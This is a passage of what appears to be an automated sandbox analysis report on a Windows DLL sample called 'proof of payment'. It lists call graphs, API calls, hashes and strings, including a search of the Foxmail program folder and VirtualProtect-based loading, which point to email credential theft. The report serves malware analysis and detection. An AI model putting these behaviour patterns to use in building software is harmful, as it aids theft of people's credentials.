10006580 26 API calls 7869->7870 7873 1000853a 7871->7873 7872 1000854f 7874 10006368 _free 20 API calls 7872->7874 7875 10008554 7872->7875 7873->7872 7873->7875 7878 1000858b 7873->7878 7876 1000857a 7874->7876 7875->7853 7877 100062ac _abort 26 API calls 7876->7877 7877->7875 7878->7875 7879 10006368 _free 20 API calls 7878->7879 7879->7876 7881 100067a4 7880->7881 7882 100067b4 7881->7882 7883 1000571e _free 20 API calls 7881->7883 7884 1000571e _free 20 API calls 7882->7884 7883->7881 7885 100067bb 7884->7885 7885->7847 6759 10009e71 6760 10009e95 6759->6760 6761 10009ee6 6760->6761 6763 10009f71 __startOneArgErrorHandling 6760->6763 6764 10009ef8 6761->6764 6767 1000aa53 6761->6767 6765 1000b2f0 21 API calls 6763->6765 6766 1000acad __startOneArgErrorHandling 6763->6766 6765->6766 6768 1000aa70 RtlDecodePointer 6767->6768 6770 1000aa80 6767->6770 6768->6770 6769 10002ada _ValidateLocalCookies 5 API calls 6772 1000ac67 6769->6772 6771 1000ab0d 6770->6771 6773 1000ab02 6770->6773 6775 1000aab7 6770->6775 6771->6773 6774 10006368 _free 20 API calls 6771->6774 6772->6764 6773->6769 6774->6773 6775->6773 6776 10006368 _free 20 API calls 6775->6776 6776->6773 6975 10003eb3 6976 10005411 38 API calls 6975->6976 6977 10003ebb 6976->6977 6215 1000543d 6216 10005440 6215->6216 6219 100055a8 6216->6219 6230 10007613 6219->6230 6222 100055b8 6224 100055c2 IsProcessorFeaturePresent 6222->6224 6225 100055e0 6222->6225 6226 100055cd 6224->6226 6260 10004bc1 6225->6260 6228 100060e2 _abort 8 API calls 6226->6228 6228->6225 6263 10007581 6230->6263 6233 1000766e 6234 1000767a _abort 6233->6234 6235 10005b7a _free 20 API calls 6234->6235 6239 100076a7 _abort 6234->6239 6242 100076a1 _abort 6234->6242 6235->6242 6236 100076f3 6237 10006368 _free 20 API calls 6236->6237 6238 100076f8 6237->6238 6240 100062ac _abort 26 API calls 6238->6240 6245 1000771f 6239->6245 6277 10005671 RtlEnterCriticalSection 6239->6277 6259 100076d6 6240->6259 6242->6236 6242->6239 6242->6259 6247 1000777e 6245->6247 6249 10007776 6245->6249 6256 100077a9 6245->6256 6278 100056b9 RtlLeaveCriticalSection 6245->6278 6247->6256 6279 10007665 6247->6279 6250 10004bc1 _abort 28 API calls 6249->6250 6250->6247 6255 10007665 _abort 38 API calls 6255->6256 6282 1000782e 6256->6282 6257 1000780c 6258 10005af6 _abort 38 API calls 6257->6258 6257->6259 6258->6259 6306 1000bdc9 6259->6306 6310 1000499b 6260->6310 6266 10007527 6263->6266 6265 100055ad 6265->6222 6265->6233 6267 10007533 ___scrt_is_nonwritable_in_current_image 6266->6267 6272 10005671 RtlEnterCriticalSection 6267->6272 6269 10007541 6273 10007575 6269->6273 6271 10007568 _abort 6271->6265 6272->6269 6276 100056b9 RtlLeaveCriticalSection 6273->6276 6275 1000757f 6275->6271 6276->6275 6277->6245 6278->6249 6280 10005af6 _abort 38 API calls 6279->6280 6281 1000766a 6280->6281 6281->6255 6283 10007834 6282->6283 6284 100077fd 6282->6284 6309 100056b9 RtlLeaveCriticalSection 6283->6309 6284->6257 6284->6259 6286 10005af6 GetLastError 6284->6286 6287 10005b12 6286->6287 6288 10005b0c 6286->6288 6289 1000637b _free 20 API calls 6287->6289 6292 10005b61 SetLastError 6287->6292 6290 10005e08 _free 11 API calls 6288->6290 6291 10005b24 6289->6291 6290->6287 6293 10005e5e _free 11 API calls 6291->6293 6297 10005b2c 6291->6297 6292->6257 6295 10005b41 6293->6295 6294 1000571e _free 20 API calls 6296 10005b32 6294->6296 6295->6297 6298 10005b48 6295->6298 6299 10005b6d SetLastError 6296->6299 6297->6294 6300 1000593c _free 20 API calls 6298->6300 6301 100055a8 _abort 35 API calls 6299->6301 6302 10005b53 6300->6302 6303 10005b79 6301->6303 6304 1000571e _free 20 API calls 6302->6304 6305 10005b5a 6304->6305 6305->6292 6305->6299 6307 10002ada _ValidateLocalCookies 5 API calls 6306->6307 6308 1000bdd4 6307->6308 6308->6308 6309->6284 6311 100049a7 _abort 6310->6311 6312 100049bf 6311->6312 6332 10004af5 GetModuleHandleW 6311->6332 6341 10005671 RtlEnterCriticalSection 6312->6341 6316 10004a65 6349 10004aa5 6316->6349 6320 10004a3c 6324 10004a54 6320->6324 6345 10004669 6320->6345 6321 100049c7 6321->6316 6321->6320 6342 1000527a 6321->6342 6322 10004a82 6352 10004ab4 6322->6352 6323 10004aae 6328 1000bdc9 _abort 5 API calls 6323->6328 6325 10004669 _abort 5 API calls 6324->6325 6325->6316 6331 10004ab3 6328->6331 6333 100049b3 6332->6333 6333->6312 6334 10004b39 GetModuleHandleExW 6333->6334 6335 10004b63 GetProcAddress 6334->6335 6338 10004b78 6334->6338 6335->6338 6336 10004b95 6339 10002ada _ValidateLocalCookies 5 API calls 6336->6339 6337 10004b8c FreeLibrary 6337->6336 6338->6336 6338->6337 6340 10004b9f 6339->6340 6340->6312 6341->6321 6360 10005132 6342->6360 6347 10004698 6345->6347 6346 10002ada _ValidateLocalCookies 5 API calls 6348 100046c1 6346->6348 6347->6346 6348->6324 6382 100056b9 RtlLeaveCriticalSection 6349->6382 6351 10004a7e 6351->6322 6351->6323 6383 10006025 6352->6383 6355 10004ae2 6357 10004b39 _abort 8 API calls 6355->6357 6356 10004ac2 GetPEB 6356->6355 6358 10004ad2 GetCurrentProcess TerminateProcess 6356->6358 6359 10004aea ExitProcess 6357->6359 6358->6355 6363 100050e1 6360->6363 6362 10005156 6362->6320 6364 100050ed ___scrt_is_nonwritable_in_current_image 6363->6364 6371 10005671 RtlEnterCriticalSection 6364->6371 6366 100050fb 6372 1000515a 6366->6372 6370 10005119 _abort 6370->6362 6371->6366 6375 10005182 6372->6375 6376 1000517a 6372->6376 6373 10002ada _ValidateLocalCookies 5 API calls 6374 10005108 6373->6374 6378 10005126 6374->6378 6375->6376 6377 1000571e _free 20 API calls 6375->6377 6376->6373 6377->6376 6381 100056b9 RtlLeaveCriticalSection 6378->6381 6380 10005130 6380->6370 6381->6380 6382->6351 6384 1000604a 6383->6384 6388 10006040 6383->6388 6385 10005c45 _free 5 API calls 6384->6385 6385->6388 6386 10002ada _ValidateLocalCookies 5 API calls 6387 10004abe 6386->6387 6387->6355 6387->6356 6388->6386 7191 10001f3f 7192 10001f4b ___scrt_is_nonwritable_in_current_image 7191->7192 7209 1000247c 7192->7209 7194 10001f57 ___scrt_is_nonwritable_in_current_image 7195 10001f52 7195->7194 7196 10002041 7195->7196 7197 10001f7c 7195->7197 7199 10002639 ___scrt_fastfail 4 API calls 7196->7199 7220 100023de 7197->7220 7200 10002048 7199->7200 7201 10001f8b __RTC_Initialize 7201->7194 7223 100022fc RtlInitializeSListHead 7201->7223 7203 10001f99 ___scrt_initialize_default_local_stdio_options 7224 100046c5 7203->7224 7207 10001fb8 7207->7194 7208 10004669 _abort 5 API calls 7207->7208 7208->7194 7210 10002485 7209->7210 7232 10002933 IsProcessorFeaturePresent 7210->7232 7214 10002496 7215 1000249a 7214->7215 7243 100053c8 7214->7243 7215->7195 7218 100024b1 7218->7195 7219 10003529 ___vcrt_uninitialize 8 API calls 7219->7215 7274 100024b5 7220->7274 7222 100023e5 7222->7201 7223->7203 7227 100046dc 7224->7227 7225 10002ada _ValidateLocalCookies 5 API calls 7226 10001fad 7225->7226 7226->7194 7228 100023b3 7226->7228 7227->7225 7229 100023b8 ___scrt_release_startup_lock 7228->7229 7230 10002933 ___isa_available_init IsProcessorFeaturePresent 7229->7230 7231 100023c1 7229->7231 7230->7231 7231->7207 7233 10002491 7232->7233 7234 100034ea 7233->7234 7235 100034ef ___vcrt_initialize_winapi_thunks 7234->7235 7246 10003936 7235->7246 7238 100034fd 7238->7214 7240 10003505 7241 10003510 7240->7241 7242 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7240->7242 7241->7214 7242->7238 7270 10007457 7243->7270 7248 1000393f 7246->7248 7249 10003968 7248->7249 7250 100034f9 7248->7250 7260 10003be0 7248->7260 7251 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7249->7251 7250->7238 7252 100038e8 7250->7252 7251->7250 7265 10003af1 7252->7265 7255 100038fd 7255->7240 7256 10003ba2 ___vcrt_FlsSetValue 6 API calls 7257 1000390b 7256->7257 7258 10003918 7257->7258 7259 1000391b ___vcrt_uninitialize_ptd 6 API calls 7257->7259 7258->7240 7259->7255 7261 10003a82 try_get_function 5 API calls 7260->7261 7262 10003bfa 7261->7262 7263 10003c18 InitializeCriticalSectionAndSpinCount 7262->7263 7264 10003c03 7262->7264 7263->7264 7264->7248 7266 10003a82 try_get_function 5 API calls 7265->7266 7267 10003b0b 7266->7267 7268 10003b24 TlsAlloc 7267->7268 7269 100038f2 7267->7269 7269->7255 7269->7256 7273 10007470 7270->7273 7271 10002ada _ValidateLocalCookies 5 API calls 7272 100024a3 7271->7272 7272->7218 7272->7219 7273->7271 7275 100024c4 7274->7275 7276 100024c8 7274->7276 7275->7222 7277 10002639 ___scrt_fastfail 4 API calls 7276->7277 7279 100024d5 ___scrt_release_startup_lock 7276->7279 7278 10002559 7277->7278 7279->7222 7706 100067bf 7711 100067f4 7706->7711 7709 100067db 7710 1000571e _free 20 API calls 7710->7709 7712 10006806 7711->7712 7721 100067cd 7711->7721 7713 10006836 7712->7713 7714 1000680b 7712->7714 7713->7721 7722 100071d6 7713->7722 7715 1000637b _free 20 API calls 7714->7715 7716 10006814 7715->7716 7718 1000571e _free 20 API calls 7716->7718 7718->7721 7719 10006851 7720 1000571e _free 20 API calls 7719->7720 7720->7721 7721->7709 7721->7710 7723 100071e1 7722->7723 7724 10007209 7723->7724 7726 100071fa 7723->7726 7725 10007218 7724->7725 7731 10008a98 7724->7731 7738 10008acb 7725->7738 7728 10006368 _free 20 API calls 7726->7728 7730 100071ff ___scrt_fastfail 7728->7730 7730->7719 7732 10008aa3 7731->7732 7733 10008ab8 RtlSizeHeap 7731->7733 7734 10006368 _free 20 API calls 7732->7734 7733->7725 7735 10008aa8 7734->7735 7736 100062ac _abort 26 API calls 7735->7736 7737 10008ab3 7736->7737 7737->7725 7739 10008ae3 7738->7739 7740 10008ad8 7738->7740 7742 10008af4 _free 7739->7742 7743 10008aeb 7739->7743 7741 100056d0 21 API calls 7740->7741 7747 10008ae0 7741->7747 7745 10008af9 7742->7745 7746 10008b1e RtlReAllocateHeap 7742->7746 7749 1000474f _free 7 API calls 7742->7749 7744 1000571e _free 20 API calls 7743->7744 7744->7747 7748 10006368 _free 20 API calls 7745->7748 7746->7742 7746->7747 7747->7730 7748->7747 7749->7742 7886 10005bff 7894 10005d5c 7886->7894 7889 10005b7a _free 20 API calls 7890 10005c1b 7889->7890 7891 10005c28 7890->7891 7892 10005c2b 11 API calls 7890->7892 7893 10005c13 7892->7893 7895 10005c45 _free 5 API calls 7894->7895 7896 10005d83 7895->7896 7897 10005d9b TlsAlloc 7896->7897 7898 10005d8c 7896->7898 7897->7898 7899 10002ada _ValidateLocalCookies 5 API calls 7898->7899 7900 10005c09 7899->7900 7900->7889 7900->7893

                                      Executed Functions

                                      Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                      • FindClose.KERNEL32(00000000), ref: 100011DB
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                      • String ID:
                                      • API String ID: 1083526818-0
                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                        • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                      • String ID: )$Foxmail$ProgramFiles
                                      • API String ID: 672098462-2938083778
                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                        • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 94->90 95->92 102 1000c865 96->102 103 1000c800-1000c80b GetProcAddress 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->102 102->95 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                        • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProcProtectVirtual$HandleModule
                                      • String ID:
                                      • API String ID: 2152742572-0
                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                      • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                      • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                      • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                      • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                      • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                      • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
